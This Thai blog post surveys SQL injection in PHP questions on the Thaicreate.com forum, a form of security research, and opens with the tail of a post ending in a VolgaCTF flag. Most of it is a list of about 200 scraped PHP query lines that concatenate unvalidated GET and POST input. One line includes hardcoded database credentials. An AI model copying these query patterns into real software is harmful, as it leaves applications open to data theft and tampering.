<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghKtTjVE6VAGZLK-ejc93ieIzwVNQ0hpGsKu4QunulOHVJASbGn7QkEJ8bp3yhLpLANl7SC5W_GIdt4yuospzejqGLLVKj0Yan2jYbA9-9eNReVUmcE7jNr1mpXcYh0SG-a2MGL7YdyI8j/s1600/meme.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghKtTjVE6VAGZLK-ejc93ieIzwVNQ0hpGsKu4QunulOHVJASbGn7QkEJ8bp3yhLpLANl7SC5W_GIdt4yuospzejqGLLVKj0Yan2jYbA9-9eNReVUmcE7jNr1mpXcYh0SG-a2MGL7YdyI8j/s1600/meme.png" /></a></div>
<br />
<b><span style="color: black;">Flag:</span></b> <b><span style="color: red;">VolgaCTF{AnoTHer_apPro0Ach_to_file_Upl0Ad_with_PhP}</span></b>ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com1tag:blogger.com,1999:blog-9154377361493966397.post-36768459439909945322016-12-13T11:59:00.001+07:002016-12-14T13:46:27.330+07:00SQL Injection vulnerabilities in Thaicreate PHP questions สืบเนื่องจาก <a href="https://laurent22.github.io/so-injections/">SQL injections vulnerabilities in Stack Overflow PHP questions</a> มีคนเขียนเว็บไปดึงข้อมูลจากเว็บ Stack Overflow เพื่อหาว่า คนตั้งคำถามที่เกี่ยวกับ PHP มีการวางโค้ดที่มีช่องโหว่ SQL Injection เยอะแค่ไหน โดยเก็บเป็นสถิติสวยงาม ผมจึงมีไอเดียที่อยากจะลองทำแบบเดียวกันนี้กับเว็บไซต์ที่มีการถามตอบคำถามที่เกี่ยวกับ PHP ในประเทศไทยบ้าง ซึ่งที่นึกได้ก็มีอยู่เว็บไซต์หนึ่งที่น่าจะเป็นชุมชนที่ใหญ่ในประเทศไทยที่มีการถามตอบเรื่องที่เกี่ยวกับการเขียนโปรแกรมหลากหลายภาษาหนึ่งในนั้นก็รวมถึง PHP ที่เป็นเป้าหมายอยู่ด้วย ผมจึงเขียนสคริป Python ง่ายๆ ไปดึงข้อมูลจากเว็บ Thaicreate.com ห้อง PHP เพื่อหาว่าคนถามตอบปัญหาที่เกี่ยวกับ PHP นั้นมีการวางโค้ดที่มีช่องโหว่ SQL Injection ที่นำ User input ไปต่อกับ SQL Query Statement โดยไม่มีการตรวจสอบอยู่เยอะแค่ไหน โดยเลือกเพียง 30 หน้าล่าสุดจากทั้งหมด โดยผมใช้ Regular expression จาก <a href="https://laurent22.github.io/so-injections/">SQL injections vulnerabilities in Stack Overflow PHP questions</a> และได้ทำการปรับแต่งเพิ่มเติมในส่วนของการตรวจสอบ SQL Injection อีกนิดหน่อยครับ<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDoy6t0bqaPbq56OxvVifO82V3p3NnzPY5hUxbt5q7BUrpxJbRLkQcUkiscw2YjrTOYZgoY2nEOYgzgYHcYuroOOIRPaM2SAQtb0Q08sq1bW4h1r9xUV2uYSnwds9lD28oCqQ1XzNwl8Mv/s1600/15369136_10207900697820695_8544240115395306181_o.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDoy6t0bqaPbq56OxvVifO82V3p3NnzPY5hUxbt5q7BUrpxJbRLkQcUkiscw2YjrTOYZgoY2nEOYgzgYHcYuroOOIRPaM2SAQtb0Q08sq1bW4h1r9xUV2uYSnwds9lD28oCqQ1XzNwl8Mv/s400/15369136_10207900697820695_8544240115395306181_o.jpg" width="400" /></a></div>
<br />
ผลลัพธ์ที่ได้คือจาก 30 หน้าล่าสุดพบการถามตอบปัญหาที่โค้ดมีช่องโหว่ SQL Injection ประมาณ 220+ กระทู้<br />
<br />
<pre class="brush:[php]; tab-size: 4;">$result=$mysqli->query("SELECT * FROM `users` WHERE `id` = '$_POST[id]'");
$strSQL = "SELECT * FROM project2 WHERE namepro = '".$_GET["item"]."'";
$strSQL = "SELECT *,SUM(money) as tomoney FROM donate WHERE namepro = '".$_GET["item"]."'";
$sql_statement = "INSERT INTO revenueother( dateother, typeother, moneyother, paybyother) VALUES ('" .$_POST["dateo"] . "', '" .$_POST["typeo"] . "', '" .$_POST["moneyo"] . "', '" .$_POST["paybyo"] . "')";
$pay_ot = "SELECT job.ser_id,job.tech_id,service.ser_id,service.sertype_id,ser_date FROM job,service,service_type WHERE service.ser_id=job.ser_id and service_type.sertype_id=service.sertype_id AND ser_date BETWEEN '$strStartDate' and '$strEndDate' and job.tech_id = '".$_GET["tech_id"]."'";
//$q="SELECT * FROM tbl_event WHERE date(event_start)>='".$_GET['start']."' ";
$strSQL = "INSERT INTO user_addcomment (src, dst, date_on , src_station , time_on , car_no , comment , name , tel , email , other) VALUES ('".$_POST["src"]."','".$_POST["dst"]."','".$_POST["date_on"]."', '".$_POST["src_station"]."','".$_POST["time_on"]."','".$_POST["car_no"]."','".$_POST["comment"]."','".$_POST["name"]."','".$_POST["tel"]."','".$_POST["email"]."','".$_POST["other"]."')";
$query = sprintf('select * from orders where orders_id=%s',s($con,$_GET['rid']));
$query3 = sprintf('update product set pro_amount="%s" where pro_no="%s" ',s($con,$_POST['amts']),s($con,$_POST['id_edit']));
$strSQL = "SELECT * FROM user WHERE user_id = ".$_GET["uID"];
$sql="select * from set_table where term_ids='".$_GET[term_ids]."' ";
$sql="INSERT INTO `time_table` (`tb_id`, `tb_subject`, `tb_time`, `tb_time_min`, `tb_time_max`, `tb_col`, `tb_week`, `tb_date`, `tb_setting`, `term_ids`) VALUES (NULL, '".$_POST[subject]."', '".$ex[1]."', '".$ex1[1]."', '".$ex_time_max."', '".$_POST[cols_table]."', '".$ex[0]."', '', '0', '".$_POST[set_term]."');";
$rs_cg = mysql_query('SELECT forum_name,forum_id FROM forum WHERE forum_id=' . $_GET['id']); //นั
mysql_query('UPDATE board SET board_views=board_views+1 WHERE board_id=' . $_GET['id']); //Update จำนวนผู้เข้าชมของกระทู้นั้น
$rs_cg = mysql_query('SELECT forum_name,forum_id FROM forum WHERE forum_id=' . $_GET['id']);
$strSQL = "SELECT * FROM yeumkuendata WHERE userid = '".$_GET["userid"]."' AND statusyk = 'ยังไม่คืน' ";
$strSQL2 = "SELECT permission FROM memberdata WHERE userid = '".$_GET["userid"]."'";
$strSQL = "SELECT * FROM tbreserv WHERE ReservID = '".$_GET["ID"]."' ";
$strSQLlogin = "SELECT * FROM admin WHERE user = '".trim($_POST['username'])."'
$strSQLlogin = "SELECT * FROM personal WHERE p_card = '".trim($_POST['username'])."'
$sql = "select * From send Where 1 and DAY(date_send)='".$_GET["dd"]."' and MONTH(date_send)='".$_GET["mm"]."' and status_s='yes' ORDER BY sendNo DESC";
$sql="SELECT * FROM tbl_language WHERE id='".$_GET['id']."'";
$query = "update tbl_language set name='".$_GET['languages']."' where id='".$_GET['id']."';
1. $sql="SELECT * FROM tbl_language WHERE id='".$_GET['id']."'"; การ where ที่ id เดาว่าผลลัพธ์ มันน่าจะมีค่าเดียว หรือมันได้กี่ค่า ตอบตัวเองครับ
$strSQL = "SELECT * FROM customer WHERE CustomerID = '".$_GET["CusID"]."' ";
$sql="insert into on_off(on1,off1) values(".$_POST["on1"].",".$_POST["off1"].")";
$strSQL = "SELECT * FROM memberdata WHERE MONTH(memregisday) BETWEEN '".$_GET['txtKeyword2']."' and '".$_GET['txtKeyword3']."' AND YEAR(memregisday) = '".$_GET['txtKeyword4']."' and status = 'USER' ";
$strSQL2 = "SELECT * FROM bookdata WHERE MONTH(bookregisday) BETWEEN '".$_GET['txtKeyword2']."' and '".$_GET['txtKeyword3']."' AND YEAR(bookregisday) = '".$_GET['txtKeyword4']."' ";
$strSQL3 = "SELECT * FROM yeumkuendata WHERE MONTH(dateborrow) BETWEEN '".$_GET['txtKeyword2']."' and '".$_GET['txtKeyword3']."' AND YEAR(dateborrow) = '".$_GET['txtKeyword4']."' ";
$strSQL = "SELECT * FROM memberdata WHERE (memberdata LIKE '%".$_GET["txtKeyword"]."%' or numberid LIKE '%".$_GET["txtKeyword"]."%' ) ";
$strSQL2 = "SELECT * FROM bookdata WHERE (bookdata LIKE '%".$_GET["txtKeyword"]."%' or numberid LIKE '%".$_GET["txtKeyword"]."%' ) ";
$strSQL3 = "SELECT * FROM yeumkuendata WHERE (yeumkuendata LIKE '%".$_GET["txtKeyword"]."%' or numberid LIKE '%".$_GET["txtKeyword"]."%' ) ";
$strSQL = "SELECT * FROM memberdata WHERE MONTH(memregisday) BETWEEN '".$_GET['txtKeyword2']."' and '".$_GET['txtKeyword3']."' AND YEAR(memregisday) = '".$_GET['txtKeyword4']."' ";
$strSQL = "INSERT INTO repost (strdate,enddate,room,name,tel) VALUES ('".$_POST["date1"]."', '".$_POST["date2"]."','".$_POST["txtRoom"]."','".$_POST["txtName"]."' ,'".$_POST["tel"]."' )";
$query = "SELECT * FROM test WHERE tags LIKE '%$_GET[value]%' order by id desc";
$query = "SELECT * FROM test WHERE tags LIKE '%".($_GET[value]).",%' order by id desc";
$strSQL = "INSERT INTO member (User,Password,Name,LastName,Gender,Address,Province,ZipCode,Tel,Email,employee,SID,Active) VALUES ('".$_POST[txtUser]."','".$_POST[txtPass]."', '".$_POST[txtName]."','".$_POST[txtLastName]."' ,'".$_POST[rdoGender]."','".$_POST[txtAddress]."', '".$_POST[txtProvince]."','".$_POST[txtZipCode]."','".$_POST[txtTel]."', '".$_POST[txtEmail]."','USER','employee','".session_id()."','No')";
$strSQL = "SELECT * FROM user WHERE username = '".trim($_POST['username'])."' ";
$strSQL = "INSERT INTO user (username,password,lastname,address,tel,email) VALUES ('".$_POST["username"]."', '".$_POST["password"]."','".$_POST["lastname"]."','".$_POST["address"]."' ,'".$_POST["tel"]."' ,'".$_POST["email"]."')";
$query ="SELECT id_name,date0,total FROM `service` where m = '".$_GET["month"]."' AND Y ='".$_GET["year"]."'";
$sqldel="Delete From stock_tb_module Where iduser='".$_GET['deluser']."'";
$seek="Select iduser from stock_tb_module Where iduser='".$_POST['user']."'";
$sqlsave="INSERT INTO stock_tb_module(iduser,typeuser) Values('".$_POST['user']."','".$_POST['type']."')";
$sql="Select stock_tb_module.*,tb_user.nameuser,tb_user.surname From stock_tb_module INNER JOIN tb_user ON stock_tb_module.iduser=tb_user.iduser Where stock_tb_module.iduser='".$_GET['user']."'";
$sql="UPDATE stock_tb_module SET typeuser='03' Where iduser='".$_GET['id']."'";
$sql="DELETE From stock_tb_module Where iduser='".$_GET['id']."'";
$sql="Select * From stock_tb_kind_type where kindid='".$_GET['kindid']."' Order by kindtypeid";
$sqldetail="INSERT INTO stock_tb_beg_master_sub(nobeg,kindtypeid,total,forbeg,user_name) Value('".$_GET['bk']."','".$_SESSION['sess_kindid'][$kid]."','".$beg[$i]."','".$for[$i]."','$user_name')";
$sqlk="Select stock_tb_kind_type.*,stock_tb_unit.unitname From stock_tb_kind_type INNER JOIN stock_tb_unit ON stock_tb_kind_type.unitid=stock_tb_unit.unitid Where kindtypeid='".$_GET['id']."'";
$sql = "SELECT * FROM saler WHERE sale_id LIKE '%".$_POST["search"]."%'";
$sql = "SELECT * FROM saler WHERE sale_id LIKE '%".$_POST["keyword"]."%'";
$strSQL = "SELECT * FROM order_details WHERE pro_id='".$_GET["txtKeyword"]."'";
$strSQL = "INSERT INTO use_addcomment (src, dst, date_on , stc_station , time_on , car_no , comment , name , tel , email , other) VALUES ('".$_POST["src"]."','".$_POST["dst"]."','".$_POST["date_on"]."', '".$_POST["src_station"]."','".$_POST["time_on"]."','".$_POST["car_no"]."','".$_POST["comment"]."','".$_POST["name"]."','".$_POST["tel"]."','".$_POST["email"]."','".$_POST["other"]."',)";
$strSQL = "SELECT * FROM bookdata inner join typedata on bookdata.typeid = typedata.typeid WHERE (namebook LIKE '%".$_GET["txtKeyword"]."%' or numberid LIKE '%".$_GET["txtKeyword"]."%' ) ";
$strSQL = "SELECT * FROM memberdata inner join majordata on memberdata.majorid = majordata.majorid WHERE userid = '".$_GET["userid"]."' ";
$strSQL = "SELECT * FROM yeumkuendata WHERE userid = '".$_GET['userid']."' ";
$strSQL = "SELECT * FROM picture WHERE (projectid LIKE '%".$_GET["txtKeyword"]."%' )";
$strSQL = "SELECT * FROM picture WHERE (projectid LIKE '%".$_GET["txtKeyword"]."%' )"; // เดิม
$strSQL = "SELECT * FROM picture WHERE projectid LIKE '%".$_GET["txtKeyword"]."%' "; // เปลี่ยน
$strSQL = "SELECT * FROM picture WHERE projectid LIKE '%".$_GET["txtKeyword"]."%' ";
select * from tabientb where (tabienno1 and tabienno2) LIKE '%$_POST[search]%'
$sql = " select * from tabientb where CONCAT(tabienno1, tabienno2) LIKE '%$_POST[search]%' ";
$sql = " select * from tabientb where (tabienno LIKE '%$_POST[search]%') AND (tabienno2 LIKE '%$_POST[search]%') ";
select * from tabientb where tabienno1 LIKE '%enno2 LIKE '%$_POST[search]%'
$strSQL = "INSERT INTO `member`(`username`,`password`,`name`,`lname`) VALUES ('".$_POST['username']."',
$strSQL = "INSERT INTO memberdata (userid,password,sex,titlename,fname,lname,majorid,email,mempic,status,memregisday) VALUES ('".$_POST["userid"]."',
$strSQL = "SELECT * FROM orders WHERE OrderID = '".$_GET["OrderID"]."' ";
$strSQL = "SELECT * FROM student WHERE (class='".$_GET["txtKeyword"]."')";
$strSQL = "SELECT * FROM yeumkuendata WHERE ykid = '".trim($_POST['ykid'])."' ";
$strSQL = "INSERT INTO yeumkuendata (userid,numberid,dateborrow,datesetreturn,statusyk) VALUES ('".$_POST["userid"]."',
$query2 = sprintf('select * from department where d_id=%s',s($con,$_GET['dept']));
$query2 = sprintf('select * from departmentp inner join personnel on departmentp.ds_id = personnel.ds_id where departmentp.ds_id=%s',s($con,$_GET['dept']));
$sel_part = "select * from tblpart where PartID = '".$_POST['chkorder'][$i]."'";
$sql="select b.pro_name,b.coler,b.pro_year,a.cat_name from category as a inner join product as b on a.cat_id=b.cat_id inner join branch as c on b.id_b=c.id_b where c.id_b='".$_GET['id_b']."' GROUP BY pro_name,coler,pro_year";
$num_car=mysql_num_rows(mysql_query("select pro_name,coler,pro_year from product where pro_name='".$result1['pro_name']."' and id_b='".$_GET['id_b']."'"))
$num_car=mysql_num_rows(mysql_query("select pro_name,coler,pro_year from product where pro_name='".$result1['pro_name']."' and coler='".$result1['coler']."' and pro_year='".$result1['pro_year']."' and id_b='".$_GET['id_b']."'"))
$strSQL = "SELECT * FROM book WHERE dates='".$_POST["myDate1"]."' and btime= '".$_POST["mytime"]."' and status='1' rid = '".$_POST["myRoom"]."' ";
$strSQLday1 = "SELECT SUM(`INV# AMOUNT`) as Total FROM `orderheader` WHERE `INV# DATE` LIKE '%20160901%' AND `ORDER DATE` LIKE '%20160901%' AND `SALESMAN` LIKE '43406' "; /* WHERE (TERM_NO LIKE '%".$_GET["txtKeyword"]."%') */
$query_rs_type="SELECT * FROM product_type WHERE gr_id ='".$_GET['lsgroup']."' ";
$strSQL = "SELECT * FROM calendar WHERE ((year = '".trim($_POST['year'])."' and month = '".trim($_POST['month'])."'
$strSQL = "INSERT INTO calendar (title,color,year,month,day,time_start,time_end,Email) VALUES ('".$_POST["title"]."','".$_POST["color"]."','".$_POST["year"]."','".$_POST["month"]."',
$sql="insert into ems (ems) values ('".$_POST['ems']."')";
$strSQL = "SELECT * FROM customer WHERE (CustomerID LIKE '%".$_GET["txtKeyword"]."%' or Email LIKE '%".$_GET["txtKeyword"]."%' )";
$strSQLdel = "DELETE FROM tblmyfiles WHERE ID = '".$_GET["ID"]."'";
$sqltxtQty = "SELECT product_amount FROM product WHERE product_id ='".$_POST["txtProductID"]."'" ;
$strSQL = "SELECT * FROM files WHERE (Name='".$_GET["txtKeyword"]."' or keyword='".$_GET["txtKeyword"]."' )";
$strSQL = "SELECT * FROM files WHERE (Name LIKE '%".$_GET["txtKeyword"]."%' or keyword LIKE '%".$_GET["txtKeyword"]."%' )";
$sql="UPDATE assessment_kpi SET score='".$_POST['score'][$i]."', head='".$_POST['head'][$i]."' where id_kpi='".$_POST['id'][$i]."' ";
$sql = $sql="UPDATE assessment_kpi SET score='".$_POST['score'][$i]."', head='".$_POST['head'][$i]."' where id_kpi='".$_POST['id'][$i]."' ";
$strSQL = "INSERT INTO Scan (RFID,Date,Time,Late) VALUES ('".$_POST["txtStudentID"]."','".date("Y-m-d")."' ,'".date("H:i:s")."','".$timeDiff."')";
$sql="Update member set Password='".$_POST["txtPass"]."',Name='".$_POST["txtName"]."',LastName='".$_POST["txtLastName"]."',Gender='".$_POST["rdoGender"]."',Address='".$_POST["txtAddress"]."',Province='".$_POST["txtProvince"]."',ZipCode='".$_POST["txtZipCode"]."',Tel='".$_POST["txtTel"]."',Email='".$_POST["txtEmail"]."' where MemberID=$id";
$stmt=$db->prepare("delete from multiupload where id ='".$_GET['id']."'");
$strSQL = "SELECT * FROM location_marker WHERE Locationname_id ='$_GET[Locationname_id]'";
$strSQL = "SELECT * FROM location_areaname WHERE Locationname_id ='$_GET[Locationname_id]'";
$strSQL = "SELECT * FROM location_polylinename WHERE Locationname_id ='$_GET[Locationname_id]'";
$rs = mysql_query("SELECT * FROM tb_applyjob WHERE jid = $_GET[jid]");
$strSQL = "SELECT * FROM family WHERE family_name_th = '".$_POST["txtfamily_name_th"]."' ";
$strSQL = "SELECT asset FROM tbl_asset WHERE 1 AND asset = '".$_POST["sCusID"]."'";
$query2 = sprintf('update orders set orders_status=2 where orders_id=%s',s($con,$_POST['orid']));
$strSQL = "SELECT * FROM animal WHERE animal_id = '".$_GET["CusID"]."' ";
$sql = "insert into uploadimags(name,date,image) value('".$_POST['Name']."','".date('Y-m-d H:i:s')."','".$new_images."')";
$sqll = "select * from uploadimags where name = '".$_POST['Name']."'";
$query1="SELECT * from tag_work_building_2 where id = '$_GET[id]'";
$strSQL = "INSERT INTO calendar (title,year,month,day,time_start,time_end) VALUES ('".$_POST["title"]."','".$_POST["year"]."','".$_POST["month"]."',
$query = sprintf('select * from event where id_event="%s"',s($con,$_GET['idv']));
select * from event where id_event= $_GET['id_event']
$strSQL = "SELECT * FROM customer WHERE 1 AND Customer_Code = '".$_POST["sCusID"]."' ";
$sql="select * from tabletb where id='$_GET[id]'";
พอจะ $sql="select * from tabletb where id='$_GET[id]'"; ก็ไม่มีค่า $_GET[id] ส่งมาค่ะ
$sql_cate="select * from category where id='$_GET[id]'";
$sql = "select * from table_name where id = '$_GET['id']' ";
$sql = "select * from employee where name like '%{$_POST['itemname']}%' or duty like '%{$_POST['itemname']}%'";
$strSQL = "SELECT * FROM packing WHERE ProductID = '".$_GET["FilesID"]."' " ;
$strSQL = "SELECT * FROM flavor WHERE ProductID = '".$_GET["FilesID"]."' ";
///$strSQL = "SELECT * FROM idp3 WHERE (day LIKE '%".$_GET["txtKeyword"]."%' or day LIKE '%".$_GET["txtKeyword"]."%' )";
$strSQL = "SELECT * FROM tbl_item,rentorder WHERE (tbl_item.TERM_NO LIKE '%".$_GET["txtKeyword"]."%' and rentorder.TERM_NO LIKE '%".$_GET["txtKeyword"]."%')";
$strSQL = "SELECT * FROM tbl_item WHERE (tbl_item.TERM_NO LIKE '%".$_GET["txtKeyword"]."%')";
$strSQL2 = "SELECT * FROM rentorder WHERE (rentorder.TERM_NO LIKE '%".$_GET["txtKeyword"]."%')";
$strSQL = "SELECT * FROM number WHERE username ='".trim($_POST['usernamelogin'])."'
$strSQL2 = "INSERT INTO files (PicName,FilesName) VALUES ('".$_POST["txtPicName"]."','".$_FILES["filUpload"]["name"]."')";
$strSQL2 = "INSERT INTO files (ID,PicName,FilesName) VALUES ('".$insertID."',".$_POST["txtPicName"]."','".$_FILES["filUpload"]["name"]."')"; // เพิ่ม Field ID ใน table file
$res = $mysqli->query("SELECT * FROM article WHERE article_id =".$_GET['u']);
$query2= sprintf ('select * from product where pro_no="%s" ',s($con,$_GET['id_del']));
$query = sprintf('delete from product where pro_no="%s" ',s($con,$_GET['id_del']));
$q="SELECT * FROM car WHERE date(timego)>='".date("Y-m-d",$_GET['start'])."' ";
$objQuery1 = "SELECT * FROM Register where $ddlSelect LIKE '%".$_POST["txtKeyword"]."%'" ;
; //*** Insert Record ***// $objConnect = mysql_connect(localhost","adtec","adtec1234") or die("Error Connect to Database"); $objDB = mysql_select_db("adtec"); mysql_query("SET character_set_results=utf8"); mysql_query("SET character_set_client=utf8"); mysql_query("SET character_set_connection=utf8"); $strSQL = "INSERT INTO album"; $strSQL .="(AlbumName,AlbumShot,Details,Male,Female,Tim,one,two,tre,four,five,note) VALUES ('".$_POST["txtAlbumName"]."','".$fileName."','". $_POST["Namer"]."','". $_POST["M"]."','". $_POST["F"]."','". $_POST["more"]."','". $_POST["textfield4"]."','".$_POST["textfield5"]."','".$_POST["textfield6"]."','".$_POST["textfield7"]."','".$_POST["textfield8"]."','".$_POST["textfield"]."')"; $objQuery = mysql_query($strSQL); mysql_close($objConnect); } ?>
แก้ตรง $sql_data = "update tb_order set paystatus='$_POST[paystatus]' where refid = '$_POST[refid2]'"; รึป่าวครับ..
mysql_query("INSERT INTO contact (id,message,name,phone,email,dateregist,timeregist) values('', '$_POST[message]','$_POST[name]','$_POST[phone]','$_POST[email]','$e_date', '$etime')") or die ("Cannot Add Database");
$strSQL = "SELECT * FROM customer WHERE 1 AND CustomerID = '".$_POST["sCusID"]."' OR Email = '".$_POST["eMail"]."' ";
$sort = mysqli_query ($con,"SELECT order_no FROM choose where Ad_num =".$_GET['pno'] );
$strSQL = "SELECT * FROM product WHERE Supplier_ID = '".$_GET["Supplier_ID "]."' ";
$strSQL = "SELECT * FROM radio_member WHERE Username = '".trim($_POST['txtUsername'])."' ";
$strSQL = "INSERT INTO radio_member (Username,Password,Name) VALUES ('".$_POST["txtUsername"]."',
$resultms = mysql_query("update ms set actqty = actqty-'".$_POST["qty$i"]."' where shopcode='".$_GET["shopcode"]."' AND productid = '".$_POST["productid$i"]."'");
$strCHECKms = "SELECT * FROM ms WHERE shopcode = '".$shop."' AND productid = '".$_POST["productid$i"]."'";
$resultoshop = mysql_query("update ms set actqty = actqty + '".$_POST["qty$i"]."' where shopcode='".$shop."' AND productid = '".$_POST["productid$i"]."'");
$resultcheckstock = mysql_query("update checkstock set status = 'Y' where shopcode='".$_GET["shopcode"]."' AND productid = '".$_POST["productid$i"]."'");
insert into ตรงนี้ เอาค่า $_POST['province_id][$i] ไปเก็บ
$sql="select * from time_sample where team='".$_POST['Require']."' and day_='".$_POST['day_']."' order by id desc";
$sql="select * from sample_user where id_staff='".$arr['id_staff']."' and day_='".$_POST['day_']."'";
$sqlup ="update stock set stock = stock - '".$_POST["txt_stock"]."' where `p_id`= '".$_POST["txt_id"]."'";
$sqlup ="update stock set stock = stock - '".$_POST["txt_stock"][$i]."' where `p_id`= '".$_POST["txt_id"][$i]."'";
$strSQL2 = "SELECT * FROM orders_detail WHERE o_id = '".$_GET["o_id"]."' ";
//$strSQL = "SELECT * FROM products,bom WHERE (Pro_ID LIKE '%".$_GET["txtKeyword"]."%')";
$strSQL = "INSERT INTO files (Name,FilesName) VALUES ('".$_POST["txtName"]."','".$_FILES["filUpload"]["name"]."')";
$strSQL = "INSERT INTO files (Name,FilesName,upload) VALUES ('".$_POST["txtName"]."','".$_FILES["filUpload"]["filUpload2"]["name"]."')";
$strSQL = "SELECT * FROM bk_room_type WHERE room_type_name = '".trim($_POST['room_type_name'])."'";
$strSQL = "SELECT * FROM bk_building WHERE building_name = '".trim($_POST['building_name'])."'";
$strSQL = "SELECT * FROM bk_janitor WHERE janitor_name = '".trim($_POST['janitor_name'])."'";
$strSQL = "SELECT * FROM bk_member_title WHERE titlename = '".trim($_POST['titlename'])."'";
$strSQL = "SELECT * FROM bk_member_majorname WHERE majorname = '".trim($_POST['majorname'])."'";
Result=mysql_query("INSERT INTO tb_example (Booking_ID,Province_ED) VALUES ('".$Booking_ID."','".$_POST['Province_ID'][$i]."')");
$strSQL = "SELECT * FROM customer WHERE (billing LIKE '%".$_GET["txtCredit"]."%' AND billing LIKE '%".$_GET["txtCash"]."%' )";
$sql_up = "update product set ProductCode='$_POST[txtProductCode]', ProductName='$_POST[txtProductName]',Description='$_POST[txtDescription]', Price='$_POST[txtPrice]',PriceNormal='$_POST[txtPriceNormal]', PriceSend='$_POST[txtPriceSend]',Stock='$_POST[txtStock]', Promotion='$_POST[rdoPromotion]',New='$_POST[rdoNew]' where ProductID='$_GET[ProductID]'";
$sql_up = "update product set Picture='$file_name' where ProductID='$_GET[ProductID]'";
$sql_up = "update product set Picture='$file_name',ProductCode='$_POST[txtProductCode]', ProductName='$_POST[txtProductName]',Description='$_POST[txtDescription]', Price='$_POST[txtPrice]',PriceNormal='$_POST[txtPriceNormal]', PriceSend='$_POST[txtPriceSend]',Stock='$_POST[txtStock]',Promotion='$_POST[rdoPromotion]',New='$_POST[rdoNew]' where ProductID='$_GET[ProductID]'";
$sql_update = "update product set Picture='$file_name' where ProductID='$_GET[ProductID]'";
$sql_up = "update product set Picture='$file_name',ProductCode='$_POST[txtProductCode]', ProductName='$_POST[txtProductName]',Description='$_POST[txtDescription]', Price='$_POST[txtPrice]',PriceNormal='$_POST[txtPriceNormal]', PriceSend='$_POST[txtPriceSend]',Stock='$_POST[txtStock]', Promotion='$_POST[rdoPromotion]',New='$_POST[rdoNew]' where ProductID='$_GET[ProductID]'";
$query = "SELECT * FROM amount_cus where = " .$_GET['edit_id'];
$strSQL = "INSERT INTO conven (convenID,dormitoryID,coname,costatus) VALUES (NULL,'$convenroomid','".$_POST["conven"][$i]."','T')";
$StrSql = "Select * from picupload WHERE ServiceCode LIKE '%".$_GET["txtKeyword"]."%'";
$strSQL = "SELECT * FROM history_med WHERE (id_run LIKE '%".$_POST["recvid"]."%' )";
$strSQL = "SELECT MAX(milesin) as max_milesin FROM ots_table WHERE carlicense = '".$_GET["item"]."' ORDER BY carlicense ASC";
$strSQL ="SELECT MAX(milesin) as max_milesin FROM ots_table WHERE carlicense = '".$_GET["item"]."' ORDER BY carlicense ASC";
$strSQL ="SELECT MAX(milesin) as max_milesin FROM ots_table WHERE carlicense = '".$_POST["item"]."' ORDER BY carlicense ASC";
$result= mysql_query("SELECT MAX(milesin) as max_milesin FROM ots_table WHERE carlicense = '".$_POST["item"]."' ORDER BY carlicense ASC");
echo $strSQL = "UPDATE article SET topic = '".trim($_POST['topic'])."'
$strSQL = "SELECT * FROM member WHERE Username = '".trim($_POST['txtUsername'])."' and Password = '".trim($_POST['txtPassword'])."' and Active = 'Yes' ";
SELECT * FROM ( select * from personal where p_id=".($_GET['p_id']*1).") per
$strSQL = "SELECT * FROM tbRoom WHERE ID_Room = '".$_GET["RoomID"]."' ";
$q="SELECT * FROM doctable WHERE name='หมอหนึ่ง' ORDER by date(timego)>='".$_GET['start']."' ";
$q="SELECT * FROM doctable WHERE name='$roo_id' ORDER by date(timego)>='".$_GET['start']."' ";
$q="SELECT * FROM doctable WHERE id='$roo_id' ORDER by date(timego)>='".$_GET['start']."' ";
$q="SELECT * FROM doctable WHERE date(timego)>='".$_GET['start']."' ";
$q="SELECT * FROM doctable WHERE name='$roo_id' ORDER by date(timego)>='".$_GET['start']."' ";
$sqld = "DELETE FROM brand WHERE id='".$_GET['did']."'";
$result = mysql_query("update product set qty = qty - '".$_POST["txtQty$i"]."' where ProductID = '".$_POST["txtProductID2$i"]."'");
$strSQL3 = "SELECT * FROM tb_ps WHERE PS_id = '".$_GET['id']."' ";
$strSQL2 = "SELECT * FROM tb_ps WHERE PS_sale LIKE '%".$_GET['txtkeyword']."%' ";
$sql = "UPDATE files SET filestatus = '$status' where FileID = '".$_POST['FileID']."'";
mysql_query("UPDATE member SET m_view=(m_view+1) WHERE m_id = '".$_GET["id"]."' AND m_line = '".$_GET["line"]."'" );
$sqls="SELECT * FROM member where m_id ='".$_GET[id]."' AND m_line = '".$_GET[line]."'";
$sqls="SELECT * FROM member where m_id ='".$_GET[id]."' AND m_line = '".$_GET[line]."' ";
$strSQL = ("INSERT INTO history_med(id_person,name_med,value_med) VALUES('"."','".$_POST["xx"]."','".$_POST["xy"]."')") ;
$q="select * from member where k_name like'$_GET[name]%' and k_age like'$_GET[age]%' and k_sex like '$_GET[sex]%' and k_address like '$_GET[s]%' and k_date like '$_GET[k_date]%'";
$sql ='SELECT * FROM member WHERE u_ser = "'.$_POST['i_ur'].'"';
$strSQL2 = "UPDATE product SET product_qty = product_qty - ".$rs['product_qty']." WHERE product_id = '".$_REQUEST['product_id']."'";
$sql3 = "select * from send where send_id = '$_GET[user_send_id]'";
$sql = " insert into book( book_id, book_name , book_detail, typebook_id) VALUES ( null, '$bookname', '$_POST[book_detail]', '$_POST[typebook_id]');";
$sql = " insert into send ( send_id, user_id, book_id , subject , send_key, send_date, send_time) VALUES ( null, '$sender', '$res' , '$_POST[subject]','$key', '$today' , '$time');";
$sql = " insert into send_detail ( send_id , user_id , vision , open , approve) VALUES ( '$res2', '$user_send[$i]', '0', '0' ,'$_POST[approve]' );";
$sql = " insert into book( book_id, book_name, book_pdf , book_detail, typebook_id) VALUES ( null, '$bookname','$bookpdf', '$_POST[book_detail]', '$_POST[typebook_id]');";
$sql = " insert into send ( send_id, user_id, book_id , subject ,send_key, send_date, send_time) VALUES ( null, '$sender', '$res' , '$_POST[subject]','$key' ,'$today' , '$time');";
$sql = " insert into send_detail ( send_id , user_id , vision , open , approve) VALUES ( '$res2', '$user_send[$i]', '$vision[$i]', '0' ,'$_POST[approve]' );";
$sql1 = "select * from court where court_time = '".$_GET["item"]."'";
